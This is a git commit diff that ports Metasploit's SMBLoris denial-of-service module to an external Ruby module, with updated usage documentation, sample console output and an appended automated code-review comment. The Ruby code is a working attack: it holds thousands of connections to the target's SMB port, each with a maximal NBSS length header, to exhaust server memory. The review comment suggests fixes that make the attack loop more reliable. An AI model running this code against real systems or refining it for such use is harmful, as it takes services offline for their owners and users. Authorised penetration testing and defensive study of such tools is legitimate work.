Convert SMBLoris to an external module
parent
71149e9c68
commit
5ece14b064
|
@ -3,7 +3,7 @@
|
|||
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
|
||||
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
|
||||
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
|
||||
|
||||
|
||||
The module opens over 64,000 connections to the target service, so please make sure
|
||||
your system ULIMIT is set appropriately to handle it. A single host running this module
|
||||
can theoretically consume up to 8GB of memory on the target.
|
||||
|
@ -14,7 +14,7 @@
|
|||
|
||||
1. Start msfconsole
|
||||
1. Do: `use auxiliary/dos/smb/smb_loris`
|
||||
1. Do: `set RHOST [IP]`
|
||||
1. Do: `set rhost [IP]`
|
||||
1. Do: `run`
|
||||
1. Target should allocate increasing amounts of memory.
|
||||
|
||||
|
@ -30,14 +30,11 @@ msf auxiliary(smb_loris) >
|
|||
|
||||
msf auxiliary(smb_loris) > run
|
||||
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
|
||||
....
|
||||
[*] Starting server...
|
||||
[*] 192.168.172.138:445 - 100 socket(s) open
|
||||
[*] 192.168.172.138:445 - 200 socket(s) open
|
||||
...
|
||||
[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits.
|
||||
[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open
|
||||
...
|
||||
```
|
||||
|
|
|
@ -1,89 +1,95 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
#!/usr/bin/env ruby
|
||||
|
||||
require 'socket'
|
||||
require 'metasploit'
|
||||
|
||||
require 'bindata'
|
||||
require 'ruby_smb'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
class NbssHeader < BinData::Record
|
||||
endian :little
|
||||
uint8 :message_type
|
||||
bit7 :flags
|
||||
bit17 :message_length
|
||||
end
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SMBLoris NBSS Denial of Service',
|
||||
'Description' => %q{
|
||||
The SMBLoris attack consumes large chunks of memory in the target by sending
|
||||
SMB requests with the NetBios Session Service(NBSS) Length Header value set
|
||||
to the maximum possible value. By keeping these connections open and initiating
|
||||
large numbers of these sessions, the memory does not get freed, and the server
|
||||
grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
|
||||
and Zach Harding.
|
||||
|
||||
DISCALIMER: This module opens a lot of simultaneous connections. Please check
|
||||
your system's ULIMIT to make sure it can handle it. This module will also run
|
||||
continuously until stopped.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'thelightcosine'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://smbloris.com/' ]
|
||||
],
|
||||
'DisclosureDate' => 'Jul 29 2017'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(445)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
header = NbssHeader.new
|
||||
header.message_length = 0x01FFFF
|
||||
|
||||
linger = Socket::Option.linger(true, 60)
|
||||
|
||||
while true do
|
||||
sockets = {}
|
||||
(1025..65535).each do |src_port|
|
||||
print_status "Sending packet from Source Port: #{src_port}"
|
||||
opts = {
|
||||
'CPORT' => src_port,
|
||||
'ConnectTimeout' => 360
|
||||
}
|
||||
|
||||
if sockets[src_port]
|
||||
disconnect(sockets[src_port])
|
||||
end
|
||||
|
||||
begin
|
||||
nsock = connect(false, opts)
|
||||
nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
|
||||
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
|
||||
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
|
||||
nsock.setsockopt(linger)
|
||||
nsock.write(header.to_binary_s)
|
||||
sockets[src_port] = nsock
|
||||
rescue ::Exception => e
|
||||
print_error "Exception sending packet: #{e.message}"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
class NbssHeader < BinData::Record
|
||||
endian :little
|
||||
uint8 :message_type
|
||||
bit7 :flags
|
||||
bit17 :message_length
|
||||
end
|
||||
|
||||
metadata = {
|
||||
name: 'SMBLoris NBSS Denial of Service',
|
||||
description: %q{
|
||||
The SMBLoris attack consumes large chunks of memory in the target by sending
|
||||
SMB requests with the NetBios Session Service(NBSS) Length Header value set
|
||||
to the maximum possible value. By keeping these connections open and initiating
|
||||
large numbers of these sessions, the memory does not get freed, and the server
|
||||
grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
|
||||
and Zach Harding.
|
||||
|
||||
DISCALIMER: This module opens a lot of simultaneous connections. Please check
|
||||
your system's ULIMIT to make sure it can handle it. This module will also run
|
||||
continuously until stopped.
|
||||
},
|
||||
authors: [
|
||||
'thelightcosine',
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
date: '2017-06-29',
|
||||
references: [
|
||||
{ type: 'url', ref: 'http://smbloris.com/' }
|
||||
],
|
||||
type: 'dos',
|
||||
options: {
|
||||
rhost: {type: 'address', description: 'The target address', required: true, default: nil},
|
||||
rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445},
|
||||
}
|
||||
}
|
||||
|
||||
def run(args)
|
||||
header = NbssHeader.new
|
||||
header.message_length = 0x01FFFF
|
||||
|
||||
last_reported = 0
|
||||
warned = false
|
||||
n_loops = 0
|
||||
sockets = []
|
||||
|
||||
target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)
|
||||
|
||||
Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "
|
||||
|
||||
while true do
|
||||
begin
|
||||
sockets.delete_if do |s|
|
||||
s.closed?
|
||||
end
|
||||
|
||||
nsock = target.connect(timeout: 360)
|
||||
nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
|
||||
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
|
||||
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
|
||||
nsock.setsockopt(Socket::Option.linger(true, 60))
|
||||
nsock.write(header.to_binary_s)
|
||||
sockets << nsock
|
||||
|
||||
n_loops += 1
|
||||
if last_reported != sockets.length
|
||||
if n_loops % 100 == 0
|
||||
last_reported = sockets.length
|
||||
Metasploit.log "#{sockets.length} socket(s) open", level: 'info'
|
||||
end
|
||||
elsif n_loops % 1000 == 0
|
||||
Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'
|
||||
end
|
||||
rescue Interrupt
|
||||
break
|
||||
sockets.each &:close
|
||||
rescue Errno::EMFILE
|
||||
Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing you system limits.", level: 'warning' unless warned
|
||||
warned = true
|
||||
sockets.slice(0).close
|
||||
rescue Exception => e
|
||||
Metasploit.log "Exception sending packet: #{e.message}", level: 'error'
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
if __FILE__ == $PROGRAM_NAME
|
||||
Metasploit.run(metadata, method(:run))
|
||||
end
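Review bot: The `rescue Exception => e` that closes the `begin` block in the new `run(args)` loop is too broad: it catches `SignalException` and `SystemExit` as well as socket errors, so if the framework stops the external process with anything other than SIGINT (which the preceding `rescue Interrupt` handles) the signal is logged as "Exception sending packet" and the `while true` loop keeps reconnecting; narrow it to `rescue StandardError => e` and add a `sleep 1` after the log so a target that refuses or resets connections immediately does not turn the loop into an unthrottled log flood. In the `rescue Interrupt` branch `sockets.each &:close` comes after `break` and is unreachable, so the held connections (with a 60 s linger) are never closed by the module itself; swap the two lines. In the `Errno::EMFILE` branch `sockets.slice(0)` only reads the oldest socket without removing it, and is `nil` if the descriptor limit is already reached before the first socket is stored, raising `NoMethodError` from inside the rescue clause; `sockets.shift&.close` would be safer. Two typos in runtime text added here are worth fixing while the file is being rewritten: "Try increasing you system limits." → "your", and "DISCALIMER" → "DISCLAIMER" in the metadata description.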
|
||||
|
|